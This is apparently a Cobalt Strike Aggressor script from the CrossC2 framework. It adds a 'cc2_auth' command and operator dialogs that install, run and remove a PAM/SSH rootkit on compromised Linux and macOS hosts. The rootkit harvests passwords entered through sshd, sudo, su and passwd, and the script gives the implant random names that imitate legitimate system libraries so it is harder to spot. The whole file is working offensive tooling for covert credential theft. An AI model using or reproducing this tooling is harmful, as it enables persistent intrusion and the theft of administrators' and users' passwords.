
# include(script_resource("CrossC2Kit.cna"));

sub printUsage_auth {
    blog($1, "\nUsage: cc2_auth <linux(32)/osx> <step> (lib_name)\n\troot permissions\nssh rootkit: Get password for auth action(sshd/sudo/su/passwd...).\n\tstep: \t<install>, <run>, <uninstall>.\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. run: \tstart running ssh rootkit.\n\tstep 3. uninstall: \tuninstall ssh rootkit.\nEx:\n\tcc2_auth linux install\n\tcc2_auth linux run\n\tcc2_auth linux uninstall libxxx.0.0.1.so\n");
}

sub cc2_auth {
    $taskName = "cc2_auth"; # taskName
    $taskType = "so";  # $taskType -> ELF, MachO, so, dylib
    $taskResType = "keystrokes"; # keystrokes -> keylogger message

    $beaconid = $1;
    $arch = $2;
    $chose = $3;
    $realPatchName = $4;
    $transportArg = "blankArg";

    $patchlib = "rootkit/auth/auth_rootkit_module";
    $loadlib = "rootkit/auth/auth_rootkit_mgr";
    $removelib = "rootkit/auth/auth_rootkit_remove";

    $os = lc(beacon_info($beaconid, "os"));
    $arch = beacon_info($beaconid, "arch");

    if ('linux' isin $os) {
        if ($arch eq 'x64') {
            $patchlib = $patchlib.".so";
            $loadlib = $loadlib.".so";
            $removelib = $removelib.".so";
        } else if ($arch eq 'x86') {
            $patchlib = $patchlib."32.so";
            $loadlib = $loadlib."32.so";
            $removelib = $removelib."32.so";
        }
    } else if ('macos' isin $os) {
        $patchlib = $patchlib.".dylib";
        $loadlib = $loadlib.".dylib";
        $removelib = $removelib.".dylib";
    } else {
        berror($beaconid, "*[error]: Only Linux/MacOS is supported for now.");
        printUsage_auth($beaconid);
        return;
    }
    $patchName = "libk5ccrypto1.0.4.so";

    if ($chose eq "install") {
        $installPath = $4;
        $authPath = $5;
        blog($beaconid, "patch auth:");
        $patchHead = @("pcre", "se", "kbr5", "k5c");
        $patchBody = @("dl", "crypto", "resolv", "z");
        $patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3");
        $patchEnd = ".so";
        $patchName = "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd;
        blog($beaconid, "patch name: ".$patchName);
        $patchArg = $patchName."^";
        if ($installPath && $authPath) {
            $patchArg = $patchArg.$installPath."^".$authPath;
        }

        bcrossc2_load_dyn($beaconid, "so", "cc2_auth_module", "info", $patchlib, $patchArg)
    } else if ($chose eq "run") {
        blog($beaconid, "get password for ssh login:");
        bcrossc2_load_dyn($beaconid, $taskType, $taskName, $taskResType, $loadlib, $transportArg);
    } else if ($chose eq "uninstall") {
        $installPath = $4;
        bcrossc2_load_dyn($beaconid, "so", "cc2_remove_auth", "info", $removelib, $installPath."^");
    } else {
        berror($beaconid, "*[error]: step type");
        printUsage_auth($beaconid);
    }
}

ssh_alias("cc2_auth", &cc2_auth);

ssh_command_register("cc2_auth", "CrossC2 auth rootkit - Get password for auth action(sshd/sudo/su/passwd...).", "\nUsage: cc2_auth <linux(32)/osx> <step> (lib_name)\n\troot permissions\nssh rootkit: Get password for auth action(sshd/sudo/su/passwd...).\n\tstep: \t<install>, <run>, <uninstall>.\n\n\tstep 1. install: \tget a prepared dynamic library file `libxxx.0.0.1.so`.\n\tstep 2. run: \tstart running ssh rootkit.\n\tstep 3. uninstall: \tuninstall ssh rootkit.\nEx:\n\tcc2_auth linux install\n\tcc2_auth linux run\n\tcc2_auth linux uninstall libxxx.0.0.1.so\n");


sub openAuthKitDialogCallBack {
    $patchRandName = $3['patchRandName'];
    $patchName = $3['patchName'];

    if (($patchName eq $null) && ($patchRandName eq $null)) {
        berror($bid, "error with patchName or patchRandName");
    } else {
        $patch_name = "";
        if ($patchName ne "") {
            $patch_name = $patchName;
        } else {
            $patch_name = $patchRandName;
        }
        $os = lc(beacon_info($bid, "os"));
        $arch = beacon_info($bid, "arch");

        blog($bid, "cc2_auth install");
        cc2_auth($bid, "", "install");
        blog($bid, "cc2_auth run");
        cc2_auth($bid, "", "run");
    }
}

sub openAuthKitDialog {
    $bid = $1;
    $dialog = dialog("PAM auth log", %(bid => $bid, patchRandName => "libk5ccrypto1.0.4.so", patchName => ""), &openAuthKitDialogCallBack);
    dialog_description($dialog, "pam auth log");
    
    $patchName = "libk5ccrypto1.0.4.so";

    $patchHead = @("pcre", "se", "kbr5", "k5c");
    $patchBody = @("dl", "crypto", "resolv", "z");
    $patchVer = @("1.0.1", "1.2.1.2", "1.0.1.3");
    $patchEnd = ".so";

    @patchNameArray = @();
    for ($x = 0; $x < 5; $x++) {
        push(@patchNameArray, "lib".$patchHead[rand(4)].$patchBody[rand(4)].$patchVer[rand(3)].$patchEnd);
    }

    drow_text($dialog, "patchName", "patchName: ");
    drow_combobox($dialog, "patchRandName", "patchRandName: ", @patchNameArray);

    dbutton_action($dialog, "run");
    dialog_show($dialog);
}

sub openAuthKitUninstallDialogCallBack {
    local('$patchName');
    $patchName = $3['patchName'];

    blog($bid, "cc2_auth uninstall ".$patchName);
    cc2_auth($bid, "", "uninstall", $patchName);
}

sub openAuthKitUninstallDialog {
    $bid = $1;
    $dialog = dialog("PAM auth log uninstall", %(bid => $bid, patchName => ""), &openAuthKitUninstallDialogCallBack);
    dialog_description($dialog, "pam auth log uninstall");

    drow_text($dialog, "patchName", "patchName: ");

    dbutton_action($dialog, "uninstall");
    dialog_show($dialog);
}


sub cc2_auth_status {
    local('$bid $os $arch $system');
    $bid = $1;
    $os = lc(beacon_info($bid, "os"));
    $arch = beacon_info($bid, "arch");
    if ('linux' isin $os) {
        if ($arch eq 'x64') {
            return 'Linux64';
        } else if ($arch eq 'x86') {
            return 'Linux32';
        }
    } else if ('macos' isin $os) {
        return 'MacOS(intel)';
    }
    return '';
}